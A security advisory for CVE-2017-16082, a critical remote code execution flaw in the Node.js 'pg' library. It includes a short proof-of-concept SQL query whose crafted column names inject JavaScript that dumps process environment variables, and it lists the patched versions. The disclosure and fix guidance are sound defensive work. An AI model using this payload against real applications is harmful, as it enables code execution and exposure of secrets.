GHSA-wc9v-mj63-m9g5

Source

https://github.com/advisories/GHSA-wc9v-mj63-m9g5

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/07/GHSA-wc9v-mj63-m9g5/GHSA-wc9v-mj63-m9g5.json

JSON Data

https://api.osv.dev/v1/vulns/GHSA-wc9v-mj63-m9g5

Aliases

CVE-2017-16082

Published

2018-07-24T19:44:42Z

Modified

2023-11-08T03:59:03.759366Z

Severity

9.8 (Critical) CVSS_V3 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVSS Calculator

Summary

Remote Code Execution in pg

Details

Affected versions of pg contain a remote code execution vulnerability that occurs when the remote database or query specifies a crafted column name.

There are two specific scenarios in which it is likely for an application to be vulnerable: 1. The application executes unsafe, user-supplied sql which contains malicious column names. 2. The application connects to an untrusted database and executes a query returning results which contain a malicious column name.

Proof of Concept

const { Client } = require('pg')
const client = new Client()
client.connect()

const sql = `SELECT 1 AS "\\'/*", 2 AS "\\'*/\n + console.log(process.env)] = null;\n//"`

client.query(sql, (err, res) => {
  client.end()
})

Recommendation

Version 2.x.x: Update to version 2.11.2 or later.
Version 3.x.x: Update to version 3.6.4 or later.
Version 4.x.x: Update to version 4.5.7 or later.
Version 5.x.x: Update to version 5.2.1 or later.
Version 6.x.x: Update to version 6.4.2 or later. ( Note that versions 6.1.6, 6.2.5, and 6.3.3 are also patched. )
Version 7.x.x: Update to version 7.1.2 or later. ( Note that version 7.0.2 is also patched. )

Database specific

{
    "github_reviewed_at": "2020-06-16T22:00:03Z",
    "cwe_ids": [
        "CWE-94"
    ],
    "nvd_published_at": null,
    "severity": "CRITICAL",
    "github_reviewed": true
}

References